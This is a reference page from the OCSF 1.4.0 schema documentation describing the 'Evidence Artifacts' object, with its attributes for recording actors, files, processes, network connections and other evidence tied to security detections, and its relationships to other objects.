Evidence Artifacts
evidences
A collection of evidence artifacts associated to the activity/activities that triggered a security detection.
Attributes
Caption | Name | Type | Description |
---|---|---|---|
Actor | actor |
Actor[] | Describes details about the user/role/process that was the source of the activity that triggered the detection. |
API Details | api |
API[] | Describes details about the API call associated to the activity that triggered the detection. |
Connection Info | connection_info |
Network Connection Information[] | Describes details about the network connection associated to the activity that triggered the detection. |
Container | container |
Container[] |
Entity:CONTAINER Describes details about the container associated to the activity that triggered the detection. |
Data | data |
JSON |
Additional evidence data that is not accounted for in the specific evidence attributes. Use only when absolutely necessary.
|
Database | database |
Database[] | Describes details about the database associated to the activity that triggered the detection. |
Databucket | databucket |
Databucket[] | Describes details about the databucket associated to the activity that triggered the detection. |
Device | device |
Device[] | An addressable device, computer system or host associated to the activity that triggered the detection. |
Destination Endpoint | dst_endpoint |
Network Endpoint[] | Describes details about the destination of the network activity that triggered the detection. |
email |
Email[] |
Entity:EMAIL The email object associated to the activity that triggered the detection. |
|
File | file |
File[] |
Entity:FILE Describes details about the file associated to the activity that triggered the detection. |
HTTP Request | http_request |
HTTP Request[] | Describes details about the http request associated to the activity that triggered the detection. |
HTTP Response | http_response |
HTTP Response[] | Describes details about the http response associated to the activity that triggered the detection. |
JA4+ Fingerprints | ja4_fingerprint_list |
JA4+ Fingerprint[] | Describes details about the JA4+ fingerprints that triggered the detection. |
Job | job |
Job[] | Describes details about the scheduled job that was associated with the activity that triggered the detection. |
Name | name |
String |
The naming convention or type identifier of the evidence associated with the security detection. For example, the @odata.type from Microsoft Graph Alerts V2 or display_name from CrowdStrike Falcon Incident Behaviors.
|
Process | process |
Linux Process[] |
Entity:PROCESS Describes details about the process associated to the activity that triggered the detection. |
DNS Query | query |
DNS Query[] | Describes details about the DNS query associated to the activity that triggered the detection. |
Raw Data | raw_data |
JSON |
Group:context The event data as received from the event source. |
Record ID | record_id |
String |
Group:primary Unique identifier for the object |
Registry Key | reg_key |
Registry Key[] |
Entity:REGISTRY_KEY Describes details about the registry key that triggered the detection. |
Registry Value | reg_value |
Registry Value[] |
Entity:REGISTRY_VALUE Describes details about the registry value that triggered the detection. |
Cloud Resources | resources |
Resource Details[] |
Describes details about the cloud resources directly related to activity that triggered the detection. For resources impacted by the detection, use Affected Resources at the top-level of the finding.
|
Script | script |
Script[] | Describes details about the script that was associated with the activity that triggered the detection. |
Source Endpoint | src_endpoint |
Network Endpoint[] | Describes details about the source of the network activity that triggered the detection. |
TLS | tls |
Transport Layer Security (TLS)[] | Describes details about the Transport Layer Security (TLS) activity that triggered the detection. |
Unique ID | uid |
String |
The unique identifier of the evidence associated with the security detection. For example, the activity_id from CrowdStrike Falcon Alerts or behavior_id from CrowdStrike Falcon Incident Behaviors.
|
Unmapped | unmapped |
Unmapped[] | Data from the source that was not mapped into the schema. |
URL | url |
Uniform Resource Locator[] |
Entity:UNIFORM_RESOURCE_LOCATOR The URL object that pertains to the event or object associated to the activity that triggered the detection. |
User | user |
User[] |
Entity:USER Describes details about the user that was the target or somehow else associated with the activity that triggered the detection. |
Verdict | verdict |
String | The normalized verdict of the evidence associated with the security detection. |
Verdict ID | verdict_id |
Integer |
The normalized verdict (or status) ID of the evidence associated with the security detection. For example, Microsoft Graph Security Alerts contain a verdict enumeration for each type of evidence associated with the Alert. This is typically set by an automated investigation process or an analyst/investigator assigned to the finding.
|
Windows Service | win_service |
Windows Service[] | Describes details about the Windows service that triggered the detection. |
Relationships
Inbound Relationships
These objects and events reference Evidence Artifacts in their attributes:
Outbound Relationships
Evidence Artifacts references the following objects and events in its attributes:
- HTTP Request
- DNS Query
- Network Connection Information
- Actor
- Device
- Registry Key
- Network Endpoint
- Linux Process
- User
- Resource Details
- Script
- Job
- JA4+ Fingerprint
- API
- Container
- Transport Layer Security (TLS)
- Registry Value
- Unmapped
- File
- Database
- Windows Service
- Databucket
- HTTP Response
- Uniform Resource Locator
This page describes ocsf-1.4.0
Updated 8 days ago